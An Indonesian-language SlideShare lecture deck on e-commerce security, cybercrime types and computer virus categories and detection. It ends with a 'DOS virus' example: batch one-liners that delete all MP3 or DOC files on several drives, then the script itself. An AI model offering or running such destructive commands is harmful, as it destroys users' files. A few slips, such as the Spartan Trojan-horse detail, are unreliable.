SlideShare a Scribd company logo
1 of 76
DIAGRAM E-COMMERCE OTOMATIS
Aspek Keamanan E – Commerce 
KONSEP DASAR KEAMANAN E-COMMERCE 
COMPUTER CRIME 
adalah istilah yang mengacu kepada aktivitas kejahatan 
dengan komputer atau jaringan komputer menjadi alat, 
sasaran atau tempat terjadinya kejahatan. 
Termasuk ke dalam kejahatan dunia maya antara lain adalah 
Penipuan dan pemalsuan (kartu Kredit,lelang,identitas, dll) 
Pencurian data 
Pengiriman virus 
Pornografi, 
 dll
Hal – Hal yang menyebabkan Bekembangnya 
KEJAHATAN ON LINE 
1. Aplikasi bisnis berbasis teknologi informasi & jaringan 
semakin meningkat 
2. Desentralisasi server 
3. Transisi dari single vendor ke Multi vendor 
4. Meningkatnya kemampuan pemakai di bidang 
komputer 
5. Mudahnya memperoleh sofware untuk menyerang 
komputer dan jaringan 
6. Kesulitan dari penegak hukum untuk mengejar pelaku 
di dunia komputer & telekomunikasi
INFORMATION SECURITY 
– Keamanan Informasi merupakan bagian 
terpenting dari E-Commerce 
– Sistem Keamanan informasi memiliki empat 
macam tujuan yang sangat mendasar : 
1. Confidentiality 
2. Intergrity 
3. Availability 
4. Authentication
Confidentiality 
• Kerahasiaan, usaha menjaga informasi dari orang 
yang tidak berhak 
• Menjamin apakah informasi yang dikirim tersebut 
tidak dapat dibuka atau diketahui oleh orang yang 
tidak berhak 
Integrity 
• Menjamin pengguna yang sah bisa mengakses 
informasi sumber miliknya sendiri 
• Orang yang tidak berhak ditolak untuk mengakses 
informasi 
• Enkripsi dan Digital Signature
Integrity menjamin konsistensi data, informasi 
tidak boleh diubah seijin pemilik informasi 
1. Keaslian Data 
2. Keutuhan Data 
3. Penduplikatan data
Availability 
• Ketersediaan Informasi ketika dibutuhkan 
• Sistem Infomasi yang diserang atau dijebol dapat 
menghambat informasi ketika dibutuhkan 
• DoS (Denial of service attack), 
• Pembanjiran permintaan pada server 
• Mailbomb
Authentication/Legitimate Use 
• Metode yang menyatakan bahwa informasi 
betul-betul asli 
• Orang yang mengakses atau memberikan 
informasi betul spt yang dimaksud 
• Keaslian Dokumen : Watermaking, digital 
signature
Aspek Keamanan E-Commerce 
Dua aspek berkaitan dengan keamanan E-commerce 
: 
1. Acces Control 
2. Non-repudiation
Access Control 
• Pengaturan akses kepada informasi 
• Mekanisme Klasifikasi Pengguna 
( Public,Privat,Confidental, top secret 
User (guest atau admin)) 
Ada 3 hal access kontrol : 
1. What You Have (Kartu Id, ATM) 
2. What You Know (Pasword,PIN) 
3. What You Are (Sidik Jari, biometric)
Non Repudiation 
 Seseorang tidak menyangkal telah 
melakukan transaksi 
 Digital Signature Certifiates (tanda tangan 
digital), Tekonologi Kriptografi (merubah 
huruf menjadi simbol tertentu) 
(SSL Server (Enkripsi Secure Socket Layer) 
melindungi komunikasi transaksi kartu kredit
2 BIDANG UNTUK PENERAPAN DAN 
MENCAPAI TEKNOLOGI KEAMANAN 
INFORMASI 
1. Sistem Keamanan Komunikasi 
Merupakan perlindungan terhadap informasi 
ketika dikirim dari sebuah sistem ke sistem 
lainnya 
2. Sistem Keamanan Komputer 
Perlindungan terhadap sistem informasi komputer 
itu sendiri meliputi keamanan perangkat lunak 
sistem operasi, keamanan terhadap perangkat lunak 
manajemen database komputer
CONTOH SERVICE KEAMANAN MEKANISME 
NON ELEKTONIK 
• Authentication > Indentitas diri,foto 
• Access Control >Checkpoint guard 
• Confidentiality > Surat tersegel, Tinta yang tidak 
terlihat 
• Intergrity > Data Tidak dpt dihapus,Hologram 
• Non-Repudiation > Tanda tangan Notaris, Surat 
teregistrasi
FAKTOR KEAMANAN LAINNYA 
Keamanan secara fisik 
• Penjaga keamanan, pintu terkunci, sistem kontrol dll 
• Keamanan personal 
• Kepribadian & tanggung jawab personal 
• Keamanan administratif 
• Kontrol terhadap perangkat lunak yang digunakan 
• Keamanan media yang digunakan 
• Media security terhadap media penyimpanan
> Security Policy 
• Faktor yang mendasar untuk keamanan 
komunikasi E-commerce 
> Authorization 
• Kebijakan keamanan yang digunakan, 
merupakan set aturan dalam security domain
OTORISASI BAGIAN DARI SECURITY POLICY BERUPA 
PEMBERIAN KEGIATAN SECARA HUKUM UNTUK 
MELAKUKAN SEGALA AKTIVITAS 
• Accountability (Akses personal security) 
• A Threat (Ancaman yang tidak diinginkan) 
• An Attack 
(Serangan dari ancaman (pasive attack, active 
attack) 
• Safeguards 
Pengamanan kontrol fisik, mekanisme,kebijakan & 
prosedur melindungi informasi 
• Vulnerabilities 
Lubang celah kemanan yang mudah ditembus 
• Risk Analysis (Resiko Kerugian)
THREATS (ANCAMAN) 
• System Penetration 
Orang yang tidak berhak mendapat akses ke sistem 
• Authorization Violation 
Pelanggaran penyalahgunaan wewenang legal 
• Planting 
Future attack, serangan kesistem yang tidak dilakukan secara langsung 
• Communications Monitoring 
• Denial of service 
Akses service user dihalangi 
• Reduption 
Penolakan terhadap sebuah aktifitas transaksi
Cyber Crime 
1. Typosite, 
membuat situs palsu yang penampilannya sama dengan situs 
aslinya,dengan harapan korban salah mengetik alamat bank resmi 
sehingga melakukan transaksi online banking di situs miliknya. 
2. Key Logger, 
sebuah cara mengunci tombol keyboard dengan menggunakan 
program logger tertentu sehingga jejak pengguna setiap kali 
memencet tombol dapat terekam di komputer. 
3. Cookies/Pathfinder, 
sebuah program yang bisa menampilkan kembali apa saja yang 
telah diketik seseorang (mirip dengan key logger). 
4. Magnetic Card Reader, 
suatu alat yang bisa digunakan untuk membaca informasi apa saja 
pada sebuah kartu, baik kartu kredit, debet, maupun cash. 
Biasanya terjadi pada orang yang kehilangan kartunya.
Typo Site
key logger
Kejahatan Online Banking 
VIRUS
Kejahatan Kartu Kredit
Cara Menyadap PIN
MASA DEPAN E – COMMERCE 
Perkembangan E-Commerce di Indonesia 
Di dalam perkembangan E-Commerce di Indonesia, memiliki tantangan 
- tantangan, diantaranya yaitu : 
1. Kultur 
• Masyarakat Indonesia, yang masih belum terbiasa dalam 
berbelanja dengan katalog. 
• Masih harus melihat secara fisik atau memegang barang yang 
akan dijual. 
• Masih senang menawar harga yang dijual. 
2. Kepercayaan 
• Kepercayaan antara penjual dan pembeli masih tipis. 
• Kepercayaan kepada pembayaran elektronik masih kurang. 
• Penggunaan masih jarang.
MASA DEPAN E-COMMERCE ? 
Tampaknya e-commerce mempunyai masa depan 
yang cerah. Jika berbagai detail dari perdagangan 
online ini dapat diselesaikan maka bukan mustahil 
e-commerce dan Internet akan mengubah struktur 
dunia usaha secara global. Dengan 
perkembangan masyarakat virtual yang demikian 
besar - banyak orang yang berpartisipasi dalam 
berbagai interest group online - memperlihatkan 
pergeseran paradigma dari 
kekuatan ekonomi yang bertumpu 
pada pembuat / manufacturer ke 
kekuatan pasar.
Paling tidak demikian yang dilihat oleh John Hagel 
dan Arthur Armstrong, sepasang analis dari 
McKinsey http://www.mckinsey.com/ sebuah 
perusahaan konsultan manajemen internasional. 
ParentsPlace http://www.parentsplace.com/ 
merupakan tempat pertemuan para orang tua 
yang akhirnya memberikan kesempatan pada 
vendor-vendor kecil untuk mencapai pelanggan 
potensial mereka untuk produk yang sangat 
spesifik seperti makanan bayi dan shampo.
BASIS IMPLEMENTASI E-COMMERCE 
BAGI WIRAUSAHAWAN 
• Mempunyai produk untuk dijual. 
• Mempunyai moralitas dan motivasi diri : jujur, 
positif, sabar, komprehensif, rasional, energik, 
visi dan misi. 
• Harus mempunyai infrastruktur internet, 
komputer dan website (gratis/berbayar). 
• Manajemen administrasi dan akutansi : punya 
metode pembayaran melalui bank, paypal, 
western union, dll, sistem purchase order, 
invoicing, receipt dan good accounting.
• Mempunyai strategi Customer Support. 
Berguna untuk proses transaksi dan 
layanan after sales. 
• Manajemen Quality Control, Packing dan 
Ekpedisi. Untuk kontrol kualitas produk, 
pengemasan dan pengiriman kepada 
pembeli. 
• Mempunyai strategi Internet Marketing 
(IM). Berguna untuk marketing, public 
relation dan branding. 
• Mempunyai jiwa spiritual dan sosial.
KEAMANAN 
DAN 
PENGENDALIAN 
DI 
INTERNET
Akses 
• Fokus dari masalah akses adalah pada 
penyediaan akses untuk semua kalangan. 
• Teknologi informasi diharapkan tidak 
menjadi halangan dalam melakukan 
pengaksesan terhadap informasi bagi 
kelompok orang tertentu.
Keamanan 
• Perlindungan terhadap informasi dan 
sistem informasi dari akses, penggunaan, 
pengungkapan, kerusakan, gangguan, 
atau modifikasi yang tidak sah. 
• Ancaman terhadap sistem informasi dibagi 
menjadi 2 yaitu : 
–Ancaman aktif 
–Ancaman pasif
Keamanan 
• Ancaman aktif meliputi kecurangan, 
penipuan dan kejahatan terhadap 
komputer. 
• Ancaman pasif meliputi kegagalan sistem, 
kesalahan manusia, dan bencana alam.
Teknik hacking - Denial of service 
Teknik ini dilakukan dengan cara 
membuat permintaan yang sangat banyak 
terhadap suatu situs sehingga sistem 
menjadi macet, dan kemudian dengan 
mencari kelemahan sistem, pelaku 
melakukan serangan terhadap sistem.
Teknik hacking - Sniffer 
• Teknik ini dilakukan dengan membuat 
program yang dapat melacak paket data 
seseorang ketika paket tersebut melintasi 
internet, menangkap password atau 
isinya.
Teknik hacking - Spoofing 
Pemalsuan alamat email atau web dengan 
tujuan menjebak pemakai agar 
memasukkan informasi yang penting 
seperti password atau nomor kartu kredit.
Teknik hacking - Logic bomb dan 
time bomb 
Program yang beraksi karena dipicu 
oleh suatu kejadian atau setelah 
selang waktu tertentu.
Teknik hacking - Virus 
• Program komputer yang dapat 
menggandakan atau menyalin dirinya 
sendiri dan menyebar dengan cara 
menyisipkan salinan dirinya ke dalam 
program atau dokumen lain. 
• Virus komputer dapat dianalogikan 
dengan virus biologis yang menyebar dengan 
cara menyisipkan dirinya sendiri ke sel 
makhluk hidup. 
• Virus komputer dapat merusak (misalnya 
dengan merusak data pada dokumen), 
membuat pengguna komputer merasa 
terganggu, maupun tidak menimbulkan efek 
sama sekali.
• Virus komputer umumnya dapat 
merusak perangkat lunak komputer dan tidak 
dapat secara langsung merusak perangkat 
keras komputer tetapi dapat mengakibatkan 
kerusakan dengan cara memuat program yang 
memaksa over process ke perangkat tertentu. 
• Efek negatif virus komputer adalah 
memperbanyak dirinya sendiri, yang membuat 
sumber daya pada komputer (seperti 
penggunaan memori) menjadi berkurang secara 
signifikan. 
• Hampir 95% virus komputer berbasis sistem 
operasi Windows. Sisanya menyerang 
Linux/GNU, Mac, FreeBSD, OS/2IBM, dan Sun 
Operating System. 
• Virus yang ganas akan merusak perangkat 
keras.
KRITERIA VIRUS KOMPUTER 
1. Kemampuan untuk mendapatkan informasi 
2. Kemampuannya untuk memeriksa suatu 
program 
3. Kemampuannya untuk menggandakan diri 
dan menularkan 
4. Kemampuannya melakukan manipulasi 
5. Kemampuannya untuk menyembunyikan diri
• KEMAMPUAN UNTUK MENDAPATKAN INFORMASI 
Pada umumnya suatu virus memerlukan daftar nama-nama 
file yang ada dalam suatu directory, agar dia 
dapat mengenali program program apa saja yang akan 
dia tulari,semisal virus makro yang akan menginfeksi 
semua file berekstensi *.doc setelah virus itu 
menemukannya, disinilah kemampuan mengumpulkan 
informasi itu diperlukan agar virus dapat membuat 
daftar/data semua file, terus memilahnya dengan 
mencari file-file yang bisa ditulari.Biasanya data ini 
tercipta saat program yang tertular/terinfeksi atau 
bahkan program virus ini dieksekusi. Sang virus akan 
segera melakukan pengumpulan data dan menaruhnya 
di RAM, sehingga apabila komputer dimatikan semua 
data hilang tetapi akan tercipta setiap program bervirus 
dijalankan dan biasanya dibuat sebagai hidden file oleh 
virus .
• KEMAMPUAN MEMERIKSA SUATU PROGRAM 
Suatu virus juga harus bisa untuk memeriksa 
suatu program yang akan ditulari, misalnya ia 
bertugas menulari program berekstensi *.doc, 
dia harus memeriksa apakah file dokumen ini 
telah terinfeksi ataupun belum, karena jika 
sudah terinfeksi, maka dia akan percuma 
menularinya 2 kali. Ini sangat berguna untuk 
meningkatkan kemampuan suatu virus dalam 
hal kecepatan menginfeksi suatu file/program. 
Yang umum dilakukan oleh virus adalah 
memiliki/ memberi tanda pada file/program yang 
telah terinfeksi sehingga mudah untuk dikenali 
oleh virus tersebut . Contoh penandaan adalah 
misalnya memberikan suatu byte yang unik 
disetiap file yang telah terinfeksi.
• KEMAMPUAN UNTUK MENGGANDAKAN DIRI 
Inti dari virus adalah kemampuan 
mengandakan diri dengan cara menulari 
program lainnya. Suatu virus apabila telah 
menemukan calon korbannya (baik file atau 
program) maka ia akan mengenalinya dengan 
memeriksanya, jika belum terinfeksi maka sang 
virus akan memulai aksinya untuk menulari 
dengan cara menuliskan byte pengenal pada 
program/file tersebut, dan seterusnya 
mengcopikan/menulis kode objek virus diatas 
file/program yang diinfeksi. Beberapa cara 
umum yang dilakukan oleh virus untuk 
menulari/ menggandakan dirinya adalah:
a. File/Program yang akan ditulari dihapus 
atau diubah namanya, kemudian diciptakan 
suatu file menggunakan nama itu dengan 
menggunakan virus tersebut (maksudnya 
virus mengganti namanya dengan nama file 
yang dihapus). 
b. Program virus yang sudah di 
eksekusi/load ke memori akan langsung 
menulari file-file lain dengan cara 
menumpangi seluruh file/program yang 
ada.
• KEMAMPUAN MENGADAKAN MANIPULASI 
Rutin (routine) yang dimiliki suatu virus akan 
dijalankan setelah virus menulari suatu 
file/program. Isi dari suatu rutin ini dapat 
beragam mulai dari yang teringan sampai 
pengrusakan. Rutin ini umumnya digunakan 
untuk memanipulasi program ataupun 
mempopulerkan pembuatnya. Rutin ini 
memanfaatkan kemampuan dari suatu 
sistem operasi (Operating System) , 
sehingga memiliki kemampuan yang 
sama dengan yang dimiliki sistem operasi.
• KEMAMPUAN MENYEMBUNYIKAN DIRI 
Kemampuan Menyembunyikan diri ini harus dimiliki oleh 
suatu virus agar semua pekerjaan baik dari awal sampai 
berhasilnya penularan dapat terlaksana. Langkah-langkah 
yang biasa dilakukan adalah: 
- Program asli/virus disimpan dalam bentuk kode 
mesin dan digabung dengan program lain yang 
dianggap berguna oleh pemakai. 
- Program virus diletakkan pada Boot Record atau 
track yang jarang diperhatikan oleh komputer 
itu sendiri. 
- Program virus dibuat sependek mungkin, dan 
hasil file yang diinfeksi tidak berubah ukurannya. 
- Virus tidak mengubah keterangan waktu suatu 
file, dll.
SIKLUS HIDUP VIRUS SECARA UMUM 
MELALUI 4 TAHAP 
• Dormant phase ( Fase Istirahat/Tidur ) 
Pada fase ini virus tidaklah aktif. Virus akan 
diaktifkan oleh suatu kondisi tertentu, 
semisal:tanggal yang ditentukan,kehadiran 
program lain/dieksekusinya program lain, dsb. 
Tidak semua virus melalui fase ini. 
• Propagation phase ( Fase Penyebaran ) 
Pada fase ini virus akan mengkopikan dirinya 
kepada suatu program atau ke suatu tempat dari 
media storage (baik hardisk, ram dsb). Setiap 
program yang terinfeksi akan menjadi hasil 
“klonning” virus tersebut (tergantung cara virus 
tersebut menginfeksinya).
• Trigerring phase ( Fase Aktif ) 
Di fase ini virus tersebut akan aktif dan hal ini juga 
di picu oleh beberapa kondisi seperti pada 
Dormant phase. 
• Execution phase ( Fase Eksekusi ) 
Pada Fase inilah virus yang telah aktif tadi akan 
melakukan fungsinya. Seperti menghapus file, 
menampilkan pesan-pesan, dsb.
JENIS-JENIS VIRUS
Worm 
Cacing computer atau juga di sebut worm (bahasa 
Inggris: computer worm atau worm) dalam 
keamanan komputer, adalah sebuah program 
komputer yang dapat menggandakan dirinya secara 
sendiri dalam sistem komputer. Sebuah worm dapat 
menggandakan dirinya dengan memanfaatkan 
jaringan (LAN/WAN/Internet) tanpa perlu campur 
tangan dari user itu sendiri. Worm tidak seperti virus 
komputer biasa, yang menggandakan dirinya dengan 
cara menyisipkan program dirinya pada program yang 
ada dalam komputer tersebut, tapi worm 
memanfaatkan celah keamanaan yang memang 
terbuka atau lebih dikenal dengan sebutan 
vulnerability. Beberapa worm juga menghabiskan 
bandwidth yang tersedia. Worm merupakan evolusi 
dari virus komputer. 
Worm - Menduplikatkan dirinya sendiri 
pada harddisk. Ini membuat sumber daya komputer 
(Harddisk) menjadi penuh akan worm itu.
Hanya ada satu cara untuk mengatasi worm 
yaitu dengan menutup celah keamanan yang 
terbuka tersebut, dengan cara meng-update 
patch atau Service Pack dari operating sistem 
yang digunakan dengan patch atau Service 
Pack yang paling terbaru. 
Virus komputer memang dapat menginfeksi 
berkas-berkas dalam sebuah sistem komputer, 
tapi worm dapat melakukannya dengan lebih 
baik. Selain dapat menyebar dalam sebuah 
sistem, worm juga dapat menyebar ke banyak 
sistem melalui jaringan yang terhubung dengan 
sistem yang terinfeksi. Beberapa worm, juga 
dapat mencakup kode-kode virus yang dapat 
merusak berkas, mencuri dokumen, e-mail, atau 
melakukan hal lainnya yang merusak, atau 
hanya menjadikan sistem terinfeksi tidak 
berguna.
Beberapa contoh dari worm adalah sebagai berikut: 
• ADMw0rm: Worm yang dapat melakukan 
eksploitasi terhadap layanan jaringan Berkeley 
Internet Name Domain (BIND), dengan melakukan 
buffer-overflow. 
• Code Red: Worm yang dapat melakukan eksploitasi 
terhadap layanan Internet Information Services (IIS) 
versi 4 dan versi 5, dengan melakukan serangan 
buffer-overflow. 
• LoveLetter: Worm yang menyebar dengan cara 
mengirimkan dirinya melalui e-mail kepada semua 
akun yang terdaftar dalam Address Book Microsoft 
Outlook Express/daftar kontak dalam Microsoft 
Outlook dengan cara menggunakan kode Visual 
Basic Script (VBScript). 
• Nimda 
• SQL-Slammer
Trojan Horse 
Trojan horse atau Kuda Troya atau yang lebih 
dikenal sebagai Trojan dalam keamanan komputer 
merujuk kepada sebuah bentuk perangkat lunak 
yang mencurigakan (malicious software/malware) 
yang dapat merusak sebuah sistem atau jaringan. 
Tujuan dari Trojan adalah memperoleh informasi 
dari target (password, kebiasaan user yang tercatat 
dalam system log, data, dan lain-lain), dan 
mengendalikan target (memperoleh hak akses 
pada target). 
Trojan 
- Mengambil data pada komputer yang telah 
terinfeksi dan mengirimkannya pada pembuat 
trojan itu sendiri.
Cara Kerja: 
Trojan berbeda dengan jenis perangkat 
lunak mencurigakan lainnya seperti virus 
komputer atau worm karena dua hal 
berikut: 
Trojan bersifat "stealth" (siluman dan tidak 
terlihat) dalam operasinya dan seringkali 
berbentuk seolah-olah program tersebut 
merupakan program baik-baik, sementara 
virus komputer atau worm bertindak lebih 
agresif dengan merusak sistem atau 
membuat sistem menjadi crash. 
Trojan dikendalikan dari komputer lain 
(komputer attacker).
Cara Penyebaran: 
Penggunaan istilah Trojan atau Trojan 
horse dimaksudkan untuk menyusupkan 
kode-kode mencurigakan dan merusak di 
dalam sebuah program baik-baik dan 
berguna; seperti halnya dalam Perang 
Troya, para prajurit Sparta bersembunyi di 
dalam Kuda Troya yang ditujukan sebagai 
pengabdian kepada Poseidon. Kuda Troya 
tersebut menurut para petinggi Troya 
dianggap tidak berbahaya, dan diizinkan 
masuk ke dalam benteng Troya yang tidak 
dapat ditembus oleh para prajurit Yunani 
selama kurang lebih 10 tahun perang 
Troya bergejolak
Kebanyakan Trojan saat ini berupa sebuah 
berkas yang dapat dieksekusi (*.EXE atau 
*.COM dalam sistem operasi Windows dan 
DOS atau program dengan nama yang sering 
dieksekusi dalam sistem operasi UNIX, seperti 
ls, cat, dan lain-lain) yang dimasukkan ke dalam 
sistem yang ditembus oleh seorang cracker 
untuk mencuri data yang penting bagi pengguna 
(password, data kartu kredit, dan lain-lain). 
Trojan juga dapat menginfeksi sistem ketika 
pengguna mengunduh aplikasi (seringnya 
berupa game komputer) dari sumber yang tidak 
dapat dipercayai dalam jaringan Internet. 
Aplikasi-aplikasi tersebut dapat memiliki kode 
Trojan yang diintegrasikan di dalam dirinya dan 
mengizinkan seorang cracker untuk dapat 
mengacak-acak sistem yang bersangkutan.
• Backdoor 
- Hampir sama dengan trojan. Namun, 
Backdoor bisanya menyerupai file yang baik-baik 
saja. Misalnya game. 
• Spyware 
- Spyware merupakan turunan dari adware, 
yang memantau kebiasaan pengguna dalam 
melakukan penjelajahan Internet untuk 
mendatangkan "segudang iklan" kepada 
pengguna. Tetapi, karena adware kurang 
begitu berbahaya (tidak melakukan 
pencurian data), spyware melakukannya 
dan mengirimkan hasil yang ia kumpulkan 
kepada pembuatnya (adware umumnya 
hanya mengirimkan data kepada 
perusahaan marketing).
• Rogue 
- merupakan program yang meniru 
program antivirus dan menampilkan aktivitas 
layaknya antivirus normal, dan memberikan 
peringatan-peringatan palsu tentang adanya 
virus. Tujuannya adalah agar pengguna 
membeli dan mengaktivasi program antivirus 
palsu itu dan mendatangkan uang bagi 
pembuat virus rogue tersebut. Juga rogue 
dapat membuka celah keamanan dalam 
komputer guna mendatangkan virus lain. 
• Rootkit 
- Virus yang bekerja menyerupai kerja sistem 
komputer yang biasa saja.
• Polymorphic virus 
- Virus yang gemar berubah-ubah agar tidak 
dapat terdeteksi. 
• Metamorphic virus 
- Virus yang mengubah pengkodeannya sendiri 
agar lebih sulit dideteksi. 
• Virus ponsel 
- Virus yang berjalan di telepon seluler, dan 
dapat menimbulkan berbagai macam efek, 
mulai dari merusak telepon seluler, mencuri 
data-data di dalam telepon seluler, sampai 
membuat panggilan-panggilan diam-diam dan 
menghabiskan pulsa pengguna telepon 
seluler.
KATEGORI VIRUS KOMPUTER 
• VIRUS MAKRO 
Jenis Virus ini pasti sudah sangat sering kita 
dengar. Virus ini ditulis dengan bahasa 
pemrograman dari suatu aplikasi bukan dengan 
bahasa pemrograman dari suatu Operating 
System. Virus ini dapat berjalan apabila aplikasi 
pembentuknya dapat berjalan dengan baik, 
maksudnya jika komputer dengan OS Windows 7 
dapat menjalankan aplikasi ms. words, maka virus 
ini bekerja pada komputer bersistem operasi 
Windows 7
Contoh virus: 
- Variant W97M, misal W97M.Panther 
Panjang 1234 bytes, akan menginfeksi 
NORMAL.DOT dan menginfeksi 
dokumen apabila dibuka. 
- WM.Twno.A;TW, panjang 41984 bytes, 
akan menginfeksi Dokumen Ms.Word 
yang menggunakan bahasa 
makro, biasanya berekstensi *.DOT 
dan *.DOC, dll.
• VIRUS BOOT SECTOR 
Virus Boot sector ini sudah umum sekali 
menyebar.Virus ini dalam menggandakan 
dirinya akan memindahkan atau 
menggantikan boot sector asli dengan 
program booting virus. Sehingga saat 
terjadi booting maka virus akan di load 
kememori dan selanjutnya virus akan 
mempunyai kemampuan mengendalikan 
hardware standar(ex::monitor, printer dsb) 
dan dari memori ini pula virus akan 
menyebar keseluruh drive yang ada dan 
terhubung kekomputer (ex: floopy, drive 
lain selain drive c).
Contoh virus : 
I. Varian virus wyx ex: wyx.C(B), menginfeksi boot 
record dan floopy; panjang : 520 bytes, 
karakteristik : memory resident dan terenkripsi. 
II. Varian V-sign, menginfeksi master boot record; 
panjang 520 bytes; karakteristik: menetap di 
memori (memory resident), terenkripsi, dan 
polymorphic) 
III. Stoned.june 4th/ bloody, menginfeksi Master 
boot record dan floopy; panjang 520 bytes; 
karakteristik: menetap di memori (memory 
resident), terenkripsi dan menampilkan 
pesan"Bloody!june 4th 1989" setelah komputer 
melakukan booting sebanyak 128 kali.
• STEALTH VIRUS 
Virus ini akan menguasai tabel tabel interupt 
pada DOS yang sering kita kenal dengan 
“Interrupt interceptor”. Virus ini 
berkemampuan untuk mengendalikan 
instruksi instruksi level DOS dan biasanya 
mereka tersembunyi sesuai namanya baik 
secara penuh ataupun ukurannya. Contoh 
virus : 
- Yankee.XPEH.4928, menginfeksi file 
*.COM dan *.EXE ; panjang 4298 bytes; 
karakteristik: menetap di memori, 
ukuran tersembunyi, memiliki pemicu.
- WXYC (yang termasuk kategori boot 
record pun karena masuk kategri 
stealth dimasukkan pula disini), 
menginfeksi floopy an motherboot 
record; panjang 520 bytes; menetap 
di memori; ukuran dan virus 
tersembunyi. 
- Vmem(s), menginfeksi file file *.EXE, 
*.SYS, dan *.COM; panjang fie 3275 
bytes; karakteristik:menetap di 
memori, ukuran tersembunyi, di 
enkripsi dll.
• POLYMORPHIC VIRUS 
Virus ini Dirancang buat mengecoh program 
antivirus, artinya virus ini selalu berusaha 
agar tidak dikenali oleh antivirus dengan 
cara selalu merubah rubah strukturnya 
setiap kali selesai menginfeksi file/program 
lain. Contoh virus: 
- Necropolis A/B, menginfeksi file *.EXE 
dan *.COM; panjang file 1963 bytes; 
karakteristik: menetap di memori, ukuran 
dan virus tesembunyi,terenkripsi dan 
dapat berubah ubah struktur.
- Nightfall, menginfeksi file *.EXE; 
panjang file 4554 bytes; karakteristik : 
menetap di memori, ukuran dan virus 
tersembunyi,memiliki pemicu, terenkripsi 
dan dapat berubah-ubah struktur dll. 
• VIRUS FILE/PROGRAM 
Virus ini menginfeksi file file yang dapat 
dieksekusi langsung dari sistem operasi, 
baik itu file application (*.EXE), maupun 
*.COm biasanya juga hasil infeksi dari virus 
ini dapat diketahui dengan berubahnya 
ukuran file yang diserangnya.
• MULTI PARTITION VIRUS 
Virus ini merupakan gabungan dari Virus 
Boot sector dan Virus file: artinya pekerjaan 
yang dilakukan berakibat dua, yaitu dia 
dapat menginfeksi file-file *.EXE dan juga 
menginfeksi Boot Sector.
Cara mengatasi 
• Serangan virus dapat dicegah atau 
ditanggulangi dengan menggunakan 
Software antivirus. 
• Jenis perangkat lunak ini dapat juga 
mendeteksi dan menghapus virus 
komputer. 
• Virus komputer ini dapat dihapus dengan 
basis data (database/ Signature-based 
detection), heuristik, atau peringkat dari 
program itu sendiri (Quantum).
• Pendeteksian dengan 
menggunakan basis data virus 
signature (virus signature database): 
• Cara kerja antivirus ini merupakan 
pendekatan yang banyak digunakan oleh 
antivirus tradisional, yang mencari tanda-tanda 
dari keberadaan dari virus dengan 
menggunakan sebagian kecil dari kode 
virus yang telah dianalisis oleh vendor 
antivirus, dan telah dikatalogisasi sesuai 
dengan jenisnya, ukurannya, daya 
hancurnya dan beberapa kategori 
lainnya.
• Pendeteksian dengan melihat cara bagaimana 
virus bekerja: Cara kerja antivirus seperti ini 
merupakan pendekatan yang baru yang dipinjam 
dari teknologi yang diterapkan dalamIntrusion 
Detection System (IDS). 
• Cara ini sering disebut juga sebagai Behavior-blocking 
detection. Cara ini menggunakan 
policy (kebijakan) yang harus diterapkan untuk 
mendeteksi keberadaan sebuah virus. 
• Jika ada kelakuan perangkat lunak yang "tidak 
wajar" menurut policy yang diterapkan, seperti 
halnya perangkat lunak yang mencoba untuk 
mengakses address book untuk mengirimkan e-mail 
secara massal terhadap daftar e-mail yang 
berada di dalam address book tersebut (cara ini 
sering digunakan oleh virus untuk menularkan 
virus melalui e-mail), maka antivirus akan 
menghentikan proses yang dilakukan oleh 
perangkat lunak tersebut.
Contoh Program Virus di DOS 
Prompt 
Yang perlu Anda ketikkan dalam DOS 
adalah: 
• echo for %%p in (C:hack) do del *.mp3 
%0 %%p:>virusdot.bat
• Maka akan muncul seekor virus yang 
bernama virus.dot dalam folder yang 
aktif.
• virus bekerja dengan menghapus semua 
file MP3 yang ada di dalamnya. 
Termasuk virus itu sendiri 
menghilangkan dirinya, untuk 
menghapus jejak.
• Apabila dimodifikasi supaya virus 
tersebut dapat menghapus dalam 
semua drive, bentuk syntax-nya adalah: 
• echo for %%p in (C D E F) do del 
*.mp3 %0 %%p:>virusdot.bat 
• Nanti, virus akan menyusup ke drive C, 
D, E, dan F untuk menghapus file MP3.
• Apabila berniat jenis file tertentu, 
katakanlah file dokumen (DOC), syntax-nya 
menjadi: 
• echo for %%p in (C D E F) do del 
*.doc %0 %%p:>virusdot.bat
TERIMA KASIH

More Related Content

What's hot

General computer security
General computer securityGeneral computer security
General computer securityHanjian Jan
 
ppt EPTIK
ppt EPTIKppt EPTIK
ppt EPTIKyusuf09
 
Materi 6-keamanan-komputer-keamanan-jringan-komputer
Materi 6-keamanan-komputer-keamanan-jringan-komputerMateri 6-keamanan-komputer-keamanan-jringan-komputer
Materi 6-keamanan-komputer-keamanan-jringan-komputersulaiman yunus
 
Keamanan Komputer
Keamanan KomputerKeamanan Komputer
Keamanan KomputerAndi Maslan
 
Tugas sim, dian anggraeni, yananto mihadi putra, se, m.si, manajemen keamanan...
Tugas sim, dian anggraeni, yananto mihadi putra, se, m.si, manajemen keamanan...Tugas sim, dian anggraeni, yananto mihadi putra, se, m.si, manajemen keamanan...
Tugas sim, dian anggraeni, yananto mihadi putra, se, m.si, manajemen keamanan...Dian Anggraeni
 
Etika dan keamanan dalam teknologi informasi
Etika dan keamanan dalam teknologi informasiEtika dan keamanan dalam teknologi informasi
Etika dan keamanan dalam teknologi informasiFitriyana Migumi
 
Cyber crime fahrunnisa ade
Cyber crime fahrunnisa adeCyber crime fahrunnisa ade
Cyber crime fahrunnisa adeadeputriw
 
Pembobolan Bank Dengan IT
Pembobolan Bank Dengan ITPembobolan Bank Dengan IT
Pembobolan Bank Dengan ITbudi rahardjo
 

What's hot (18)

General computer security
General computer securityGeneral computer security
General computer security
 
Uas
UasUas
Uas
 
ppt EPTIK
ppt EPTIKppt EPTIK
ppt EPTIK
 
Materi 6-keamanan-komputer-keamanan-jringan-komputer
Materi 6-keamanan-komputer-keamanan-jringan-komputerMateri 6-keamanan-komputer-keamanan-jringan-komputer
Materi 6-keamanan-komputer-keamanan-jringan-komputer
 
Keamanan Jaringan
Keamanan JaringanKeamanan Jaringan
Keamanan Jaringan
 
Keamanan Komputer
Keamanan KomputerKeamanan Komputer
Keamanan Komputer
 
Tugas sim, dian anggraeni, yananto mihadi putra, se, m.si, manajemen keamanan...
Tugas sim, dian anggraeni, yananto mihadi putra, se, m.si, manajemen keamanan...Tugas sim, dian anggraeni, yananto mihadi putra, se, m.si, manajemen keamanan...
Tugas sim, dian anggraeni, yananto mihadi putra, se, m.si, manajemen keamanan...
 
ISS GSLC-3
ISS GSLC-3ISS GSLC-3
ISS GSLC-3
 
Ns 1
Ns 1Ns 1
Ns 1
 
